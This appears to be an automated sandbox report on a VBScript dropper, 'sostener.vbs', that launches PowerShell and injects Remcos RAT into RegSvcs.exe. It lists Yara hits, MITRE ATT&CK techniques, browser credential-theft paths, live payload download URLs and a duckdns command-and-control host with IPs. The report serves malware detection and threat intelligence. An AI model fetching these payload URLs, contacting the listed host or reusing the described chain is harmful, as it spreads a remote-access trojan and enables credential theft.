                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040B164 GetLocalTime,wsprintfW,27_2_0040B164
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041B60D GetUserNameW,27_2_0041B60D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004493AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,27_2_004493AD
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.3325855778.0000000002DEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000002.2023426786.0000000000967000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2124, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6852, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Contains functionality to steal Chrome passwords or cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data27_2_0040BA12
                        Contains functionality to steal Firefox passwords or cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\27_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \key3.db27_2_0040BB30

                        Remote Access Functionality

                        barindex
                        Detected Remcos RAT
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3PWW8OJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3PWW8O
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3PWW8O
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.3325855778.0000000002DEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000002.2023426786.0000000000967000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2124, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6852, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: cmd.exe27_2_0040569A

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information321
                        Scripting                        		Valid Accounts11
                        Native API                        		321
                        Scripting                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		12
                        Ingress Tool Transfer                        		Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		1
                        Bypass User Account Control                        		3
                        Obfuscated Files or Information                        		211
                        Input Capture                        		1
                        Account Discovery                        		Remote Desktop Protocol211
                        Input Capture                        		21
                        Encrypted Channel                        		Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		1
                        Windows Service                        		1
                        Access Token Manipulation                        		2
                        Software Packing                        		2
                        Credentials In Files                        		1
                        System Service Discovery                        		SMB/Windows Admin Shares3
                        Clipboard Data                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Service Execution                        		21
                        Registry Run Keys / Startup Folder                        		1
                        Windows Service                        		1
                        DLL Side-Loading                        		NTDS4
                        File and Directory Discovery                        		Distributed Component Object ModelInput Capture1
                        Remote Access Software                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts3
                        PowerShell                        		Network Logon Script222
                        Process Injection                        		1
                        Bypass User Account Control                        		LSA Secrets33
                        System Information Discovery                        		SSHKeylogging2
                        Non-Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                        Registry Run Keys / Startup Folder                        		1
                        Masquerading                        		Cached Domain Credentials21
                        Security Software Discovery                        		VNCGUI Input Capture23
                        Application Layer Protocol                        		Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                        Virtualization/Sandbox Evasion                        		DCSync21
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Access Token Manipulation                        		Proc Filesystem3
                        Process Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                        Process Injection                        		/etc/passwd and /etc/shadow1
                        Application Window Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519307 Sample: sostener.vbs Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 108 comandoespecial2023.duckdns.org 2->108 110 www.informacionoportuna.com 2->110 112 2 other IPs or domains 2->112 126 Suricata IDS alerts for network traffic 2->126 128 Found malware configuration 2->128 130 Malicious sample detected (through community Yara rule) 2->130 134 20 other signatures 2->134 13 wscript.exe 1 2->13         started        16 powershell.exe 11 2->16         started        18 powershell.exe 2->18         started        signatures3 132 Uses dynamic DNS services 108->132 process4 signatures5 168 VBScript performs obfuscated calls to suspicious functions 13->168 170 Suspicious powershell command line found 13->170 172 Wscript starts Powershell (via cmd or directly) 13->172 174 2 other signatures 13->174 20 powershell.exe 7 13->20         started        23 wscript.exe 16->23         started        25 conhost.exe 16->25         started        27 wscript.exe 18->27         started        29 conhost.exe 18->29         started        process6 signatures7 136 Suspicious powershell command line found 20->136 138 Bypasses PowerShell execution policy 20->138 140 Found suspicious powershell code related to unpacking or dynamic code loading 20->140 142 Wscript called in batch mode (surpress errors) 20->142 31 powershell.exe 14 17 20->31         started        36 conhost.exe 20->36         started        144 Wscript starts Powershell (via cmd or directly) 23->144 38 powershell.exe 23->38         started        40 powershell.exe 27->40         started        process8 dnsIp9 118 informacionoportuna.com 15.235.85.194, 443, 49730, 49731 HP-INTERNET-ASUS United States 31->118 98 C:\Users\user\AppData\Local\Temp\xx2.vbs, ASCII 31->98 dropped 100 C:\Users\user\AppData\Local\Temp\xx1.ps1, ASCII 31->100 dropped 120 Writes to foreign memory regions 31->120 122 Injects a PE file into a foreign processes 31->122 42 RegSvcs.exe 31->42         started        45 RegSvcs.exe 3 16 31->45         started        49 powershell.exe 24 31->49         started        59 2 other processes 31->59 124 Wscript called in batch mode (surpress errors) 38->124 51 wscript.exe 38->51         started        53 conhost.exe 38->53         started        55 wscript.exe 40->55         started        57 conhost.exe 40->57         started        file10 signatures11 process12 dnsIp13 150 Contains functionality to bypass UAC (CMSTPLUA) 42->150 152 Contains functionalty to change the wallpaper 42->152 154 Contains functionality to steal Chrome passwords or cookies 42->154 166 3 other signatures 42->166 114 comandoespecial2023.duckdns.org 173.208.241.155, 49733, 8888 WIIUS United States 45->114 116 geoplugin.net 178.237.33.50, 49734, 80 ATOM86-ASATOM86NL Netherlands 45->116 102 C:\ProgramData\remcos\logs.dat, data 45->102 dropped 156 Detected Remcos RAT 45->156 158 Installs a global keyboard hook 45->158 160 Loading BitLocker PowerShell Module 49->160 61 powershell.exe 1 11 49->61         started        162 Suspicious powershell command line found 51->162 164 Wscript starts Powershell (via cmd or directly) 51->164 64 powershell.exe 51->64         started        66 powershell.exe 55->66         started        104 C:\Users\...\sostener.vbs:Zone.Identifier, ASCII 59->104 dropped 106 C:\Users\user\AppData\Local\...\sostener.vbs, Unicode 59->106 dropped file14 signatures15 process16 signatures17 176 Creates autostart registry keys with suspicious values (likely registry only malware) 61->176 178 Creates autostart registry keys with suspicious names 61->178 180 Suspicious powershell command line found 64->180 68 powershell.exe 64->68         started        71 conhost.exe 64->71         started        73 powershell.exe 66->73         started        75 conhost.exe 66->75         started        process18 signatures19 146 Writes to foreign memory regions 68->146 148 Injects a PE file into a foreign processes 68->148 77 RegSvcs.exe 68->77         started        80 powershell.exe 68->80         started        82 powershell.exe 68->82         started        92 2 other processes 68->92 84 RegSvcs.exe 73->84         started        86 powershell.exe 73->86         started        88 powershell.exe 73->88         started        90 powershell.exe 73->90         started        process20 signatures21 182 Detected Remcos RAT 77->182 94 powershell.exe 80->94         started        96 powershell.exe 86->96         started        process22

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        sostener.vbs13%ReversingLabsWin32.Trojan.Honolulu

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://nuget.org/NuGet.exe0%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        https://go.micro0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        http://geoplugin.net/json.gp0%URL Reputationsafe
                        http://geoplugin.net/json.gp/C0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        https://oneget.orgX0%URL Reputationsafe
                        https://aka.ms/pscore680%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        https://oneget.org0%URL Reputationsafe
                        HTTPS://WWW.INFORMACIONOPORTUNA.COM/WP-CONTENT/UPLOADS/2024/07/REMCOS.TXT100%Avira URL Cloudmalware
                        https://www.informacionoportuna.com/wp-content/uploads/2024/100%Avira URL Cloudmalware
                        http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                        http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
                        https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt100%Avira URL Cloudmalware
                        http://informacionoportuna.com0%Avira URL Cloudsafe
                        http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                        http://www.informacionoportuna.com0%Avira URL Cloudsafe
                        https://www.informacionoportuna.com0%Avira URL Cloudsafe
                        https://aka.ms/pscore60%Avira URL Cloudsafe
                        http://geoplugin.net/json.gpSystem320%Avira URL Cloudsafe
                        https://github.com/Pester/Pester0%Avira URL Cloudsafe
                        https://www.informacionoportuna.com/wp-content/uploads/2024/07/r100%Avira URL Cloudmalware
                        http://crl.m0%Avira URL Cloudsafe
                        https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txt100%Avira URL Cloudmalware
                        http://crl.v0%Avira URL Cloudsafe
                        special2023.duckdns.org0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        informacionoportuna.com
                        		15.235.85.194
                        		truetrue
                          		unknown
                          comandoespecial2023.duckdns.org
                          		173.208.241.155
                          		truetrue
                            		unknown
                            geoplugin.net
                            		178.237.33.50
                            		truefalse
                              		unknown
                              www.informacionoportuna.com
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txttrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.informacionoportuna.com/wp-content/uploads/2024/07/remcos.txttrue
                                  		unknown
                                  special2023.duckdns.orgtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txttrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://geoplugin.net/json.gpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  HTTPS://WWW.INFORMACIONOPORTUNA.COM/WP-CONTENT/UPLOADS/2024/07/REMCOS.TXTpowershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1A99C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3AD38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B5B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993DE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B994661000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2423857034.0000029B2A50B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F818B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A371C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A3853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.0000029060DA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F572000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000005.00000002.1800597027.0000020F81458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.informacionoportuna.com/wp-content/uploads/2024/powershell.exe, 00000003.00000002.1814218663.0000029B1BACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B32E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B9943DA000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1826959101.0000029060C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://geoplugin.net/json.gplRegSvcs.exe, 00000008.00000002.3320747702.0000000001257000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.informacionoportuna.compowershell.exe, 00000003.00000002.1814218663.0000029B1A6B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1B3E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3AA8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993E47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993B3B000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1826959101.0000029060C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://go.micropowershell.exe, 00000003.00000002.1814218663.0000029B1B3E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3AD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993E47000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://informacionoportuna.compowershell.exe, 00000003.00000002.1814218663.0000029B1BAA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B9943B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://aka.ms/pscore6powershell.exe, 00000017.00000002.2087405410.000001EA3EFFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.informacionoportuna.compowershell.exe, 00000003.00000002.1814218663.0000029B1BAA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B9943B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.informacionoportuna.com/wp-content/uploads/2024/07/rpowershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B5B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B994661000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1826959101.0000029060C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://geoplugin.net/json.gpSystem32RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.mpowershell.exe, 00000005.00000002.1972234119.0000020FEC49C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2423857034.0000029B2A50B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F818B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A371C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A3853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.0000029060DA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F572000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://oneget.orgXpowershell.exe, 00000005.00000002.1800597027.0000020F81458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://aka.ms/pscore68powershell.exe, 00000003.00000002.1814218663.0000029B1A491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.00000168936A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.000002905F3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3A861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2859978942.000001311D3AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2859978942.000001311D3CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2087405410.000001EA3F00F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2055308899.000001208E7B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2055308899.000001208E79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2029330543.0000024E81B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2029330543.0000024E81B7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3037888768.00000155ACC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 